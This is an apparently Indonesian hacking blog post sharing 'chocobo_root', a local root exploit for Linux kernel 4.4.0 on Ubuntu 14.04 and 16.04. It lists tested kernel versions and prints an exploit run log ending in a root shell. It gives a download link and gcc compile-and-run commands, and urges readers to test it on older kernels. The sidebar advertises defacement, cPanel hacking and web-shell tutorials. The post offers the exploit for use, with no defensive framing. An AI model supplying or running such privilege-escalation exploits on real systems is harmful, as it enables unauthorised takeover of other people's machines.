• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Linux Kernel 4.4.0 Race Condition Privilege Escalation

December 9, 2016 by Jack Wilder 2 Comments

Yo, Kali ini cuma mau share localroot yang barusaja dipublish beberapa hari yang lalu. Localroot ini menyerang kernel 4.4.0 yang berarti vuln di Ubuntu 14.04 dan Ubuntu 16.04.

Kernel yang sudah di test :
  • Ubuntu 16.04: 4.4.0-51-generic
  • Ubuntu 16.04: 4.4.0-47-generic
  • Ubuntu 16.04: 4.4.0-36-generic
  • Ubuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu

Kemungkinan localroot ini juga berlaku untuk mendapatkan hak akses root di kernel yang lebih tua dari 4.4.0 . Jadi silahkan di test sendiri saja.
Log :

retrying stage..
new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 133577, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don’t do that.
closing socket and verifying…….
sysctl added!

stage 2 completed
binary executed by kernel, launching rootshell
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root),1000(user)

  • Download Localroot

Cara compile :

gcc chocobo_root.c -o chocobo_root -lpthread
./chocobo_root

Oke sekian artikel kali ini, see you next time.

Filed Under: Uncategorized Tagged With: Exploit, Localroot, Ubuntu

Reader Interactions

Comments

  1. pemakanwortel says

    February 15, 2017 at 5:19 pm

    maaf bang , penjelasan dari
    *gcc
    *chocobo_root.c
    *-o
    *chocobo_root
    *-lpthread

    itu sendiri apa ya? kok disetiap xploit waktu compile beda beda

    Reply
    • chiaki says

      February 23, 2017 at 6:19 am

      ya kan tergantung nam file yg dikompile. dan modul apa yang ingin dikompile

      Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

Open Redirect Bypass Cheat Sheet

Cara Mudah Hack cPanel dengan Fitur Reset Password

MIME Type Sniffing pada Form Upload Gambar

Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

RCE pada Redis via Master-Slave Replication

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

Download 1n73ct10n / 1n73ction Privat Web Shell by X’1N73CT

FCKeditor Bypass Shell Upload With Burp Suite Intercept

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

LinuxSec / 18 queries in 0.12 seconds